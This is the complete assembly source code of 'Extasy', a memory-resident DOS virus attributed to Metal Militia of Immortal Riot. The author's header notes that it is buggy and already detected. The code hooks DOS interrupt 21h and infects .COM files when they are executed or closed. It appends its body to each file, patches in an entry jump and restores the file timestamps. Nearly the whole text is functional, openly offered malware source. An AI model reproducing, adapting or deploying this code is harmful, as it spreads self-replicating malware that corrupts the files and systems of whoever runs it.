; Virusname: Extasy ; Origin: Sweden ; Author: Metal Militia ; This virus can be found with any anti-virus program, since it's been ; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON that is..) ; ; It's a resident .COM infector, without any encryption or stealth ; capabilities. It infects when you execute (4bh) or closes (3eh). ; This virus looks pretty much like RAVAGE, since it's pretty much ; alike except for that RAVAGE infects .EXE files too. ; ; I stopped with this virus since it's so totally buggy that you'll find ; it almost at once. This is the reason why i give you the source code. ; In my later resident things, there will be such things as encryption, ; stealth etc. i think.. .model tiny .code .radix 16 .code viruslength = heap - _small startload = 90 * 4 _small: call relative oldheader dw 020cdh dw 0bh dup (0) relative: pop bp push ds push es xor ax,ax mov ds,ax mov es,ax mov di,startload cmp word ptr ds:[di+25],di jz exit_small lea si,[bp-3] mov cx,viruslength db 2Eh rep movsb mov di,offset old21 + startload mov si,21*4 push si movsw movsw pop di mov ax,offset int21 + startload stosw xchg ax,cx stosw exit_small: pop es pop ds or sp,sp jnp returnCOM returnGNU: returnCOM: mov di,100 push di mov si,bp movsw movsb ret infect: push ax push bx push cx push dx push si push di push ds push es mov ax,3d02 int 21 xchg ax,bx push cs pop ds push cs pop es mov ax,5700h int 21h push cx push dx mov si,offset oldheader+startload mov ah,3f mov cx,18 push cx mov dx,si int 21 cmp ax,cx jnz go_already_infected mov di,offset target + startload push di rep movsb pop di mov ax,4202 cwd int 21 cmp ds:[di],'ZM' jz infectNOT cmp ds:[di],'MZ' jz infectNOT sub ax,3 mov byte ptr ds:[di],0e9 mov ds:[di+1],ax sub ax,viruslength cmp ds:[si-17],ax jnz finishinfect go_already_infected: pop cx jmp short already_infected db "EXTASY!" db "(c) Metal Militia / Immortal Riot" int21: cmp ax,4b00 jz kewl cmp ax,3e00 jnz oops mov ah,45 int 21 jmp kewl oops: jmp chain infectNOT: jmp go_already_infected kewl: jmp infect finishinfect: mov cx,viruslength mov dx,startload mov ah,40 int 21 mov ax,4200 xor cx,cx cwd int 21 mov ah,40 mov dx,di pop cx int 21 already_infected: pop dx pop cx mov ax,5701h int 21h mov ah,3e int 21 exitinfect: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax chain: db 0ea heap: old21 dw ?, ? target dw 0ch dup (?) endheap: end _small